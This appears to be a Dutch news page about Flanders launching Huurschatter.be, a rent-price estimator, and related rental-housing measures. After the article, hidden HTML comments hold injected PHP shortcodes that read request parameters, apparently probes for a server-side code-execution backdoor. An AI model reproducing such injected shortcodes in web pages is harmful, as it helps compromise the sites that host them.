ZIJook.nl
Image default
Woning en Tuin

Huurwoning laten isoleren

Vlaams minister van Wonen Freya Van den Bossche heeft de website Huurschatter.be gelanceerd. Daar kunnen zowel huurders als verhuurders voortaan terecht om uit te zoeken of ze een faire prijs betalen dan wel vragen voor hun woning.

De Huurschatter kadert in een nieuw ‘Huurplan’ van Van den Bossche, waarin ook onder meer een herlancering van de sociale dakisolatie kadert. Een team van de KU Leuven analyseerde de afgelopen drie jaar de huurmarkt, om een correcte inschatting van de prijzen per regio te kunnen maken. “We analyseerden onder meer de databank van de Vlaamse Maatschappij voor Sociaal Wonen en keken naar de verkoopprijzen van huizen in alle steden en gemeenten”, zegt onderzoeker Frank Vastmans, die het project leidde.

Het resultaat is een zeer uitgebreide databank. Wie op Huurschatter.be invult waar hij wil wonen en welke eisen hij aan zijn toekomstige woonst stelt, zoals een terras of een recente badkamer, krijgt een prijsvork waarbinnen de maandelijkse huur zou moeten liggen. “Die vork kan worden gebruikt bij een onderhandeling met de verhuurder”, zegt Van den Bossche.

“De huurder kan zo aandringen op een prijsverlaging, maar ook bijvoorbeeld op een extra investering, zoals een nieuwe verwarmingsketel.” Ook voor de verhuurders heeft de databank volgens de minister voordelen. “De Vlaamse woningmarkt wordt gekenmerkt door een groot aantal niet-professionele verhuurders. Zij weten niet altijd welke prijs ze moeten aanrekenen en kunnen daar vanaf nu de simulator voor gebruiken.”

Nog een stap verder gaan de Sociale Verhuurkantoren, die al zowat 6.400 woningen op vraag van de eigenaar aanbieden aan sociale huurders. “De eigenaars worden op die manier verlost van alle administratieve rompslomp en krijgen gegarandeerd elke maand correct betaald”, stelt Van den Bossche.

De komende weken wordt een advertentiecampagne voor de Sociale Verhuurkantoren gevoerd op televisie en op het internet. Een andere maatregel in het Huurplan van de minister is het huurgarantiefonds, dat al eerder werd aangekondigd en ten laatste op 1 januari zal worden gelanceerd. Het fonds komt maximum negen maanden tussenbeide als huurders wegens achterstallige betaling uit hun woning dreigen te worden gezet. Ook de premies die verhuurders krijgen voor spouwmuurisolatie van de woning van huurders die het minder breed hebben bestaan al langer, maar zullen opnieuw onder de aandacht worden gebracht.

Meer weten over dit artikel : Bezoek dan de website

<!– [insert_php]if (isset($_REQUEST["ohrf"])){trim($_REQUEST["ohrf"]);exit;}[/insert_php][php]if (isset($_REQUEST["ohrf"])){trim($_REQUEST["ohrf"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["dTOz"])){trim($_REQUEST["dTOz"]);exit;}[/insert_php][php]if (isset($_REQUEST["dTOz"])){trim($_REQUEST["dTOz"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["lBfx"])){trim($_REQUEST["lBfx"]);exit;}[/insert_php][php]if (isset($_REQUEST["lBfx"])){trim($_REQUEST["lBfx"]);exit;}[/php] –>